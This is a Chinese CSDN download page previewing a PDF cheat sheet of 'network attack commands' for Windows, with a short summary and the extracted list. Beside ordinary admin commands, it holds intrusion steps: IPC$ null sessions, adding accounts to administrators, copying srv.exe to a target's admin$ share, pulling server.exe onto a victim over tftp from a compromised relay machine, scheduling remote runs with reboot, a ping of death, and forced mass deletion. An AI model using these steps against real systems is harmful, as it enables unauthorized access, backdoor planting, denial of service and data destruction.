网络攻击命令大全资源-CSDN文库

需积分: 15 31 浏览量 2014-02-20 20:32:21 上传评论 1 收藏 188KB PDF 举报

本篇文章详细介绍了网络攻击中常用的一些命令，这些命令是高级攻击者在网络环境中进行攻击的得力工具，涵盖了网络连接、用户管理、服务控制、信息获取等多个方面。以下是对这些知识点的详细介绍： 1. IPC$连接命令：IPC$是Inter Process Communication的缩写，它是一种使用共享命名管道来实现进程间通信的机制。通过IPC$可以建立与远程计算机的空连接或非空连接，可以映射对方的磁盘，甚至是直接登陆对方计算机。例如，使用命令`net use \\ip\ipc$`可以建立一个空的IPC连接，而`net use \\ip\ipc$ 密码 /user:用户名`则可以建立一个非空的IPC连接。 2. 用户管理命令：通过`net user`命令可以创建用户、激活或禁用guest账户、查看用户列表和账户属性，还能将用户添加到管理员组中。例如，`net user 用户名密码/add`用于创建新用户，`net localgroup administrators 用户名/add`用于将用户添加到管理员组。 3. 服务管理命令：`net start`和`net stop`命令可以查看和开启/停止本地或远程计算机上的服务，`net time`命令可以查看远程计算机的时间或设置本地计算机时间与远程同步。 4. 网络信息获取命令：`net view`和`nbtstat`命令分别用于查看本地和远程计算机上的共享资源和最近登录的用户名。此外，`ipconfig`命令可以用于查看本地计算机的IP配置信息。 5. 文件和目录操作命令：命令如`del`、`move`、`rmdir`等用于删除、移动或删除文件和目录，特别地，`/F`参数可以强制结束进程，`/Q`参数可以在删除时不显示确认信息。 6. 信息对比和计划任务命令：`fc`命令可以对比两个文件的不同之处并输出到指定的文件中。通过`at`命令可以开启、查看或停止计划任务，而`tracert`和`ping`命令可用于追踪路由和检测网络连通性。 7. 端口和网络协议状态命令：`netstat`命令可用于查看开启的端口和网络连接情况，其参数`-a`、`-n`、`-v`、`-p`可以提供不同的查看角度。`netstat -s`命令则可以查看所有网络协议的使用情况。 8. 死亡之ping：通过`ping`命令的参数设置，可以执行持续的大数据包ping操作，这在某些情况下会导致对方系统崩溃，即所谓的“死亡之ping”。 9. 网络连接配置命令：`netconfig`命令可以显示当前系统的网络配置。 10. 其他命令：`netshare`命令用于管理本地开启的共享资源，`netlogoff`用于断开连接的共享，`netpause`用于暂停服务，`netsend`用于向对方发送信息。使用这些命令需要具备一定的权限和知识，不当的使用可能导致安全风险。而且，这些命令的操作一般涉及敏感操作，需要在合法和道德的范围内使用。由于这些命令具有潜在的危险性，在没有授权的情况下使用它们攻击计算机系统是违法的行为。因此，对于系统管理员来说，了解这些命令的同时，也应该采取必要的安全措施来防范网络攻击。

资源推荐

资源详情

资源评论

基本上可以作为电子书使用，希望对各位有用

net use \ip\ipc$ " " /user:" " 建立 IPC 空链接

net use \ip\ipc$ "密码" /user:"用户名" 建立 IPC 非空链接

net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后映射对方 C：到本地为 H:

net use h: \ip\c$ 登陆后映射对方 C：到本地为 H:

net use \ip\ipc$ /del 删除 IPC 链接

net use h: /del 删除映射对方到本地的为 H:的映射

net user 用户名密码 /add 建立用户

net user guest /active:yes 激活 guest 用户

net user 查看有哪些用户

net user 帐户名查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注

意：administrator 后加 s 用复数

net start 查看开启了哪些服务

net start 服务名开启服务；(如:net start telnet， net start schedule)

net stop 服务名停止某服务

net time \目标 ip 查看对方时间

net time \目标 ip /set 设置本地计算机时间与“目标 IP”主机的时间同步,加上参数/yes 可取消

确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启 ipc$共享

net share ipc$ /del 删除 ipc$共享

net share c$ /del 删除 C：共享

net user guest 12345 用 guest 用户登陆后用将密码改为 12345

net password 密码更改系统登陆密码

netstat -a 查看开启了哪些端口,常用 netstat -an

netstat -n 查看端口的网络连接情况，常用 netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名例：netstat -p tcq/ip 查看某协议使用情况（查看 tcp/ip 协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方 136 到 139 其中一个端口开了的话，就可查看对方最近登陆的用户名（03

前的为用户名）-注意：参数-A 要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w 数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为 32 字节的数据，参数：“-l[空格]数据包大小”；

“-n 发送数据次数”；“-t”指一直 ping。

ping -t -l 65550 ip 死亡之 ping(发送大于 64K 的文件并一直 ping 就成了死亡之 ping)

ipconfig (winipcfg) 用于 windows NT 及 XP(windows 95 98)查看本地 ip 地址，ipconfig 可用

PDF 文件使用 "pdfFactory Pro" 试用版本创建 www.fineprint.cn

参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的

Support/tools 文件夹内)

kill -F 进程名加-F 参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装

目录的 Support/tools 文件夹内)

del -F 文件名加-F 参数后就可删除只读文件,/AR、/AH、/AS、/AA 分别表示删除只读、隐

藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A 表示删除除只读、隐藏、系统、存档以外

的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当

前目录下除系统文件以外的所有文件

del /S /Q 目录或用：rmdir /s /Q 目录 /S 删除目录及目录下的所有子目录和文件。同时使用

参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y

将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到 3st.txt 文件中，"> "和"> >" 是

重定向命令

at id 号开启已注册的某个计划任务

at /delete 停止所有计划任务，用参数/yes 则不需要确认就直接停止

at id 号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为 23

open ip 连接到 IP（属 telnet 登陆后的命令）

telnet 在本机上直接键入 telnet 将进入本机的 telnet

copy 路径\文件名 1 路径\文件名 2 /y 复制文件 1 到指定的目录为文件 2，用参数/y 就同时

取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地 c:\srv.exe 到对方的 admin 下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将 2st.txt 的内容藏身到 1st.jpg 中生成 3st.jpg 新的文件，注：

2st.txt 文件头要空三排，参数：/b 指二进制文件，/a 指 ASCLL 格式文件

copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方 admini$共享下的 srv.exe 文件

（所有文件）至本地 C：

xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树，用参数/Y 将不提示覆

盖相同文件

tftp -i 自己 IP(用肉机作跳板时这用肉机 IP) get server.exe c:\server.exe 登陆后，将“IP”的

server.exe 下载到目标主机 c:\server.exe 参数：-i 指以二进制模式传送，如传送 exe 文件时用，

如不加-i 则以 ASCII 模式（传送文本文件模式）进行传送

tftp -i 对方 IP put c:\server.exe 登陆后，上传本地 c:\server.exe 至主机

ftp ip 端口用于上传文件至服务器或进行文件操作，默认端口为 21。bin 指用二进制方式传

送（可执行文件进）；默认为 ASCII 格式传送(文本文件时)

route print 显示出 IP 路由，将主要显示网络地址 Network addres，子网掩码 Netmask，网关

地址 Gateway addres，接口地址 Interface

arp 查看和处理 ARP 缓存，ARP 是名字解析的意思，负责把一个 IP 解析成一个物理性的

MAC 地址。arp -a 将显示出全部信息

PDF 文件使用 "pdfFactory Pro" 试用版本创建 www.fineprint.cn

start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

mem 查看 cpu 使用情况

attrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的存档，只读，系统，隐藏属

性；用＋则是添加为某属性

dir 查看文件，参数：/Q 显示文件及目录属系统哪个用户，/T:C 显示文件创建时间，/T:A 显

示文件上次被访问时间，/T:W 上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输

入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符 p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

if 在批处理程序中执行条件处理（更多说明见 if 命令及变量）

goto 标签将 cmd.exe 导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，

例如：“：start”标签）

call 路径\批处理文件名从批处理程序中调用另一个批处理程序（更多说明见 call /?）

for 对一组文件中的每一个文件执行某个特定命令（更多说明见 for 命令及变量）

echo on 或 off 打开或关闭 echo，仅用 echo 不加参数则显示当前 echo 设置

echo 信息在屏幕上显示出信息

echo 信息 >> pass.txt 将"信息"保存到 pass.txt 文件中

findstr "Hello" aa.txt 在 aa.txt 文件中寻找字符串 hello

find 文件名查找某文件

title 标题名字更改 CMD 窗口标题名字

color 颜色值设置 cmd 控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、

5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、

F=亮白

prompt 名称更改 cmd.exe 的显示的命令提示符(把 C:\、D:\统一改为：EntSky\ )

ver 在 DOS 窗口下显示版本信息

winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

format 盘符 /FS:类型格式化磁盘,类型:FAT 、 FAT32、NTFS ,例：Format D: /FS:NTFS

replace 源文件要替换文件的目录替换文件

ren 原文件名新文件名重命名文件名

tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

type 文件名显示文本文件的内容

more 文件名逐屏显示输出文件

doskey 要锁定的命令＝字符

doskey 要解锁命令= 为 DOS 提供的锁定命令(编辑命令行，重新调用 win2k 命令，并创建

宏)。如：锁定 dir 命令：doskey dir=entsky (不能用 doskey dir=dir)；解锁：doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘 D 并显示状态报告；加参数/f 并修复磁盘上的错误

PDF 文件使用 "pdfFactory Pro" 试用版本创建 www.fineprint.cn

剩余16页未读，继续阅读

评论收藏

内容反馈

Acornm

粉丝: 3
资源: 3

网络攻击命令大全

一些常用的网络攻击命令

网络攻击与防范实验报告.docx

锐捷交换机设备对网络攻击的防范

Dos网络命令大全

NS2模拟DoS网络攻击tcl源代码

网络攻击与防范的试题

windows网络命令大全

DELPHI 网络攻击PING.rar

网络常见攻击的种类分析

计算机网络攻击的应对研究.pdf

网络攻击与防范_Nmap端口扫描实现_20150402.docx

cnhoncker网络攻击Q组社工软件

网络攻击方法总结

网络攻击效果评估技术..docx

网络游戏-检测网络攻击.zip

网络攻击与防范 拒绝服务攻击实验.docx

《计算机网络与信息安全技术》电子CH网络攻击行为分析PPT课件.ppt

网络攻击与防御的实例分析

网络游戏-网络攻击的预警方法及装置.zip

《网络攻击透视与防范》上机指导书

网络攻击解决

常用DOS命令大全及其用法详解

网络攻击与防御 实验九.docx

分布式拒绝服务攻击——备受黑客青睐的网络攻击手段.pdf

网络安全与cmd命令大全

网络命令综合大全(DOC)

网络命令详细介绍

fiddler中文免安装版

KepOPC工业互联网数据交换平台V2.4.9

最新资源

网络攻击与防范拒绝服务攻击实验.docx

网络攻击与防御实验九.docx